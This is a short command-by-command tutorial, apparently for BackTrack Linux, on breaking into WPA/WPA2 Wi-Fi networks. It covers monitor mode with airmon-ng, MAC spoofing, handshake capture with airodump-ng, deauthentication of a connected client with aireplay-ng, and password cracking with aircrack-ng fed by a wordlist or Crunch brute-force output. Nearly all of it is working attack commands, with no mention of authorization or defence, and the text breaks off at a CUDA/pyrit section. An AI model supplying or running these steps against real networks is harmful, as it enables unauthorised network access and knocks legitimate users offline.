Backtrack

airmon-ng

The result will be something like :

Interface Chipset Driver

wlan0 Intel 5100 iwlagn - [phy0]

Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down

macchanger -m 00:11:22:33:44:55 mon0

ifconfig mon0 up

Step 4 :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel

-w is the file to be written

--bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID

-c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz

cd crunch-3.0

make

make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

...